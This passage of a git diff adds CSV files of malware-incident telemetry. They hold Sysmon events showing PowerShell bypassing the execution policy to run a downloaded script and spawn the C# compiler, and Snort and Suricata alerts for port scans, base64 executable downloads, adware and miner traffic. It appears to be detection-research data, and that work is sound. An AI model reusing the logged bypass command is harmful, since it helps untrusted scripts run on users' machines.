MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:28.502498400Z"",""eventRecordID"":""2004"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:28.498\r\nProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800}\r\nProcessId: 1116\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:28.498"",""processGuid"":""{df9fc3d3-b358-5ecf-0000-0010a3db1800}"",""processId"":""1116"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:54.977",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:27.095 +ProcessGuid: {df9fc3d3-b357-5ecf-0000-001037ca1800} +ProcessId: 5100 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\cvu0gejp.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\cvu0gejp.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:27.098235300Z"",""eventRecordID"":""2001"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:27.095\r\nProcessGuid: {df9fc3d3-b357-5ecf-0000-001037ca1800}\r\nProcessId: 5100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\cvu0gejp.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:27.095"",""processGuid"":""{df9fc3d3-b357-5ecf-0000-001037ca1800}"",""processId"":""5100"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\cvu0gejp.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:54.899",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:26.537 +ProcessGuid: {df9fc3d3-b356-5ecf-0000-001076c41800} +ProcessId: 5700 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\ee4f5jeg.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ee4f5jeg.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:26.583221400Z"",""eventRecordID"":""1996"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:26.537\r\nProcessGuid: {df9fc3d3-b356-5ecf-0000-001076c41800}\r\nProcessId: 5700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ee4f5jeg.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:26.537"",""processGuid"":""{df9fc3d3-b356-5ecf-0000-001076c41800}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\ee4f5jeg.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", diff --git a/data/MW_25_NIDS.csv b/data/MW_25_NIDS.csv new file mode 100644 index 0000000..981e215 --- /dev/null +++ b/data/MW_25_NIDS.csv @@ -0,0 +1,19 @@ +"@timestamp",message,"log.file.path" +"May 29, 2020 @ 14:21:25.502","05/29-14:21:19.657708 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:60084 -> 192.168.8.69:445","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:21:20.612","05/29/2020-14:21:19.657708 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:60084 -> 192.168.8.69:445","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:20:25.576","05/29/2020-14:20:19.984308 [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55745 -> 192.168.2.85:1433","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:20:25.575","05/29/2020-14:20:16.318886 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55501 -> 192.168.2.96:445","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:20:20.491","05/29-14:20:16.318861 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55470 -> 192.168.2.65:445","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:20:20.491","05/29-14:20:19.984308 [**] [1:2001583:15] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55745 -> 192.168.2.85:1433","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:19:25.473","05/29-14:19:23.650895 [**] [1:2013479:4] ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Outbound) [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:52090 -> 10.100.101.19:3389","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:19:24.468","05/29-14:19:19.961586 [**] [1:2001583:15] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51854 -> 10.100.101.39:1433","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:19:20.506","05/29/2020-14:19:19.961586 [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51854 -> 10.100.101.39:1433","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:19:17.440","05/29-14:19:16.499697 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51627 -> 10.100.101.69:445","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:19:17.435","05/29/2020-14:19:16.499697 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51627 -> 10.100.101.69:445","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:18:41.427","05/29-14:18:38.793907 [**] [1:2831048:2] ETPRO POLICY Observed SSL Cert (IP Lookup - ipify .org) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 50.19.115.217:443 -> 172.16.2.2:50014","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:18:41.427","05/29/2020-14:18:38.920893 [**] [1:2831048:3] ETPRO POLICY Observed SSL Cert (IP Lookup - ipify .org) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 50.19.115.217:443 -> 172.16.2.2:50014","/var/log/suricata/fast.log" +"May 29, 2020 @ 14:18:06.410","05/29-14:17:58.191201 [**] [1:2029538:2] ET POLICY EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:18:06.410","05/29-14:17:58.191201 [**] [1:2018856:11] ET TROJAN Windows executable base64 encoded [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:18:06.410","05/29-14:18:02.035227 [**] [1:2029538:2] ET POLICY EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:18:06.410","05/29-14:18:02.035227 [**] [1:2018856:11] ET TROJAN Windows executable base64 encoded [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast" +"May 29, 2020 @ 14:18:06.409","05/29/2020-14:17:58.522757 [**] [1:2029538:2] ET HUNTING EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/suricata/fast.log" diff --git a/data/MW_26_NIDS.csv b/data/MW_26_NIDS.csv new file mode 100644 index 0000000..ccd6f4a --- /dev/null +++ b/data/MW_26_NIDS.csv @@ -0,0 +1,79 @@ +"@timestamp",message,"log.file.path" +"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.653837 [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.951978 [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.951978 [**] [1:2021076:2] ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:32.535","05/30/2020-13:55:26.542692 [**] [1:2016141:6] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49780 -> 217.8.117.132:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:30.509","05/30-13:55:26.542525 [**] [1:2021076:1] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:30.508","05/30-13:55:17.468932 [**] [1:2016141:3] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49780 -> 217.8.117.132:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:30.508","05/30-13:55:26.542525 [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:30.508","05/30-13:55:26.542525 [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:17.503","05/30/2020-13:55:17.465317 [**] [1:2400033:2750] ET DROP Spamhaus DROP Listed Traffic Inbound group 34 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.138679 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.192526 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.192526 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.275291 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.370275 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:14.240994 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:15.505","05/30-13:55:14.240994 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.159022 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.233200 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.233200 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.366310 [**] [1:2833089:4] ETPRO ADWARE_PUP Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 13.90.173.206:80 -> 172.16.2.2:49768","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.366467 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.686253 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.066809 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56201 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.337680 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.337680 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 13:55:08.503","05/30-13:55:07.251486 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: 